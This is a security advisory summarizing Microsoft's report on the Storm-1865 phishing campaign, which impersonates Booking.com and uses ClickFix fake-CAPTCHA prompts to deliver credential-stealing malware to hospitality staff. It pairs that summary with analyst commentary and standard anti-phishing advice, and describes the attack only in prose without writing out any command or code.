Summary:
Microsoft Threat Intelligence has detected an active and evolving phishing campaign, designated as Storm-1865, which commenced in December 2024 and persists as of February 2025. This campaign specifically targets organizations within the hospitality sector, with a focus on individuals most likely to interact with Booking.com. Geographically, targets span North America, Oceania, South and Southeast Asia, and various regions of Europe. The attackers employ a widely-adopted social engineering tactic called ClickFix, designed to manipulate users into manually executing malicious commands. This technique involves presenting fake error messages or prompts that instruct users to copy, paste, and launch commands within the Windows Run window to “fix” the issue, which ultimately leads to the download and execution of multiple malware families. These malware families include XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT, each possessing capabilities for credential theft and financial data exfiltration.

The campaign leverages emails that impersonate Booking[.]com, with varying content such as fake guest reviews, prospective guest inquiries, and account verification prompts. These emails contain links or PDF attachments that redirect users to a fraudulent webpage mimicking Booking[.]com, complete with a fake CAPTCHA to enhance the illusion of legitimacy. This fake CAPTCHA is the point where the ClickFix technique is deployed. The command downloads and launches malicious code through mshta.exe. The malicious code downloaded via mshta.exe varies, occasionally including PowerShell, JavaScript, and portable executable content, all aimed at facilitating financial fraud. Storm-1865 has a history of targeting users of online platforms, including hotel guests via Booking[.]com in 2023 and e-commerce buyers in 2024, demonstrating a pattern of adapting and expanding its list of employed attack vectors.

Security Officer Comments:
This phishing campaign by Storm-1865 highlights some critical trends in cybersecurity. The targeting of the hospitality sector, particularly those who work with Booking[.]com, demonstrates the attackers' strategic approach to maximize their chances of success. By impersonating a trusted platform and leveraging the time-sensitive nature of the hospitality industry, they increase the likelihood of users falling victim to the scam.

The ClickFix technique has gained significant traction and widespread adoption among threat actors due to its surprising effectiveness, as described in Group-IB’s recent analysis. Storm-1865's incorporation of ClickFix into their attacks highlights the importance of organizations remaining vigilant and proactively monitoring for new threats to then continuously update their security measures. It underscores the importance of security awareness training that goes beyond simply recognizing phishing emails. Users need to be educated about the dangers of blindly copying and pasting commands from untrusted sources onto their machine, even if they are presented within what appears to be a legitimate page or interface.

The use of multiple malware families like Lumma Stealer indicates the attackers' hefty arsenal of advanced malware and their desire to maximize their potential gains. These malware types are known for their credential harvesting and remote access capabilities, which perfectly align with the campaign's financial fraud objectives. The adversary’s focus on persistence and the effectiveness of their methods is underscored by the fact that this activity has been ongoing since at least 2023, necessitating that organizations establish an adaptive security posture.

Suggested Corrections:
IOCs are available here.

• Check the sender’s email address to ensure it’s legitimate: Assess whether the sender is categorized as first-time, infrequent, or marked as “[External]” by your email provider. Hover over the address to ensure that the full address is legitimate. Keep in mind that legitimate organizations do not send unsolicited email messages or make unsolicited phone calls to request personal or financial information. Always navigate to those organizations directly to sign into your account.
• Contact the service provider directly: If you receive a suspicious email or message, contact the service provider directly using official contact forms listed on the official website.
• Be wary of urgent calls to action or threats: Remain cautious of email notifications that call to click, call, or open an attachment immediately. Phishing attacks and scams often create a false sense of urgency to trick targets into acting without first scrutinizing the message’s legitimacy.
• Hover over links to observe the full URL: Sometimes, malicious links are embedded into an email to trick the recipient. Simply clicking the link could let a threat actor download malware onto your device. Before clicking a link, ensure the full URL is legitimate. For best practice, rather than following a link from an email, search for the company website directly in your browser and navigate from there.
• Search for typos: Phishing emails often contain typos, including within the body of the email, indicating that the sender is not a legitimate, professional source, or within the email domain or URL, as mentioned previously. Companies rarely send out messages without proofreading content, so multiple spelling and grammar mistakes can signal a scam message. In addition, check for very subtle misspellings of legitimate domains, a technique known as typosquatting. For example, you might see micros0ft[.]com, where the second o has been replaced by 0, or rnicrosoft[.]com, where the m has been replaced by r and n.

Link(s):
https://thehackernews.com/2025/03/microsoft-warns-of-clickfix-phishing.html

https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/